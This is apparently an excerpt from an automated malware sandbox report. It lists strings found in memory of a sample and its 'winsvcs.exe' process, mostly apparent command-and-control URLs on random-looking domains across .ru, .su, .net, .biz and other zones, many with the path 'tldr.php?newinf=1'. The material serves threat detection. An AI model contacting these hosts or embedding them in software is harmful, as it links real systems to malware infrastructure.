        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nnososoosjfeuhueu.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nnososoosjfeuhueu.net/afeifieuuufufufuf.net5
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nnososoosjfeuhueu.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nnososoosjfeuhueu.net/tldr.php?newinf=1e
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nnososoosjfeuhueu.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nnososoosjfeuhueu.ru/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nnososoosjfeuhueu.ru/tldr.php?newinf=192
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nnososoosjfeuhueu.su/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nnososoosjfeuhueu.su/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://noeuaoenriusfiruu.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.biz/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://noeuaoenriusfiruu.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.com/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.com/tldr.php?newinf=14k
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.com/tldr.php?newinf=1L
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://noeuaoenriusfiruu.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.in/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.in/tldr.php?newinf=1Qh
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://noeuaoenriusfiruu.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://noeuaoenriusfiruu.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.net/tldr.php?newinf=1=BZ
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://noeuaoenriusfiruu.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.ru/tldr.php?newinf=1f1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://noeuaoenriusfiruu.su/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.su/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://noeuaoenriusfiruu.su/tldr.php?newinf=1Ho
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nousiieiffgogogoo.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.biz/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.biz/tldr.php?newinf=1B
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.biz/tldr.php?newinf=1Lk2
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nousiieiffgogogoo.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.com/tldr.php?ne
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.com/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nousiieiffgogogoo.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.in/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nousiieiffgogogoo.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nousiieiffgogogoo.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.net/tldr.php?newinf=1G
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nousiieiffgogogoo.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.ru/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.ru/tldr.php?newinf=1#2p
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: 